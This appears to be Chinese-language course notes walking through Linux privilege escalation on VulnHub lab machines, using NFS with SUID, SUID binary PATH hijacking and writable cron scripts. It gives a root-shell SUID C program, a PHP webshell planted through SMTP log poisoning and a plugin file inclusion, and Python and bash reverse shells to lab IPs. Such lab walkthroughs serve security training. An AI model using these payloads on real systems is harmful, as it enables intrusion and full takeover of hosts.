DAY140权限提升-Linux系统权限提升篇VulnhubPATH变量NFS服务Cron任务配合SUID

一、演示案例-Linux系统提权-Web&普通用户-SUID-NFS安全

NFS是一种基于TCP/IP 传输的网络文件系统协议，通过使用NFS协议，客户机可以像访问本地目录一样访问远程服务器中的共享资源。

https://www.virtualbox.org/wiki/Downloads

https://www.vulnhub.com/entry/hacksudo-2-hackdudo,667/

前提条件：NFS端口服务开启和web或用户权限进行利用

1、信息收集

nmap 192.168.1.6

http://192.168.1.6/file.php?file=/etc/passwd

2、NFS服务利用

showmount -e 192.168.1.6

//用于显示NFS（网络文件系统）服务器上所有已导出的文件系统列表的命令

mkdir nfs  //本地kali创建一个nfs目录

mount -t nfs 192.168.1.6:/mnt/nfs ./nfs  //把目标的/mnt/nfs目录跟kali本地的nfs目录进行同步

3、配合SUID提权

find / -perm -u=s -type f 2>/dev/null  //查看本地suid权限的文件

两种解决方式：1、找一个与目标版本相似的系统，上传这个系统的find 2、找一个与目标版本相似的系统，自己写一个c语言去调用命令

getroot.c

#include<stdlib.h>

#include<unistd.h>

int main()

{

setuid(0);

system("id");

system("/bin/bash");

}

gcc getroot.c -o getroot

//把getroot.c编译为getroot可执行文件

cp getroot /root/nfs  //复制bash到挂载目录下

chmod +777 getroot //赋予777权限

chmod +s getroot   //赋予suid权限

find / -perm -u=s -type f 2>/dev/null //使用查看当前suid权限看看是否有/mnt/nfs/getroot文件

cd /mnt/nfs     //目标机来到/mnt/nfs目录下

./getroot       //目标机执行getroot文件触发shell

python -c 'import pty; pty.spawn("/bin/bash")'  //python起一个交互式终端

getroot.c

#include<stdlib.h>

#include<unistd.h>

int main()

{

setuid(0);

system("id");

system("whoami");  //whoami就是要执行的命令

}

二、演示案例-Linux系统提权-普通用户-SUID-PATH变量

复现环境：symfonos: 1 ~ VulnHub

前提条件：存在SUID的应用中能执行额外命令加用户权限

1、信息收集

smbclient -L 192.168.139.153

2、权限获取

smbclient //192.168.139.153/anonymous

smbclient //192.168.139.153/helios -U helios

helios \ qwerty

3、漏洞利用

wpscan --url http://192.168.139.153/h3l105/ --plugins-detection aggressive

searchsploit mail masta 1.0  //利用searchsploit搜索mail漏洞或者百度关键字

http://192.168.139.153/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

telnet 192.168.139.153 25

MAIL FROM: MALABIS

RCPT TO: helios

data

<?php system($_GET['shell']); ?>

.

QUIT

http://192.168.139.153/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&shell=

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.139.128",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

4、权限提升

python -c 'import pty;pty.spawn("/bin/bash")'  //python起一个交互终端

find / -perm -u=s -type f 2>/dev/null  //查看当前环境suid

strings /opt/statuscheck  //查看这个文件的内容，寻找有用信息

cd /tmp

echo "/bin/sh" > curl

chmod 777 curl

export PATH=/tmp:$PATH

echo $PATH

/opt/statuscheck

三、演示案例-Linux系统提权-Web&普通用户-Cron计划任务

复现环境：Jarbas: 1 ~ VulnHub

1、信息收集

http://192.168.139.152/access.html

2、权限获取

http://192.168.139.152:8080/

3、权限提升

cat /etc/crontab //查看当前服务器的计划任务

ls -lia /etc/script/CleaningScript.sh  //查看对该任务文件的权限

echo "/bin/bash -i >& /dev/tcp/192.168.139.141/66 0>&1" >> /etc/script/CleaningScript.sh //把反弹shell命令写进这个文件里

cat /etc/script/CleaningScript.sh   //查看脚本内容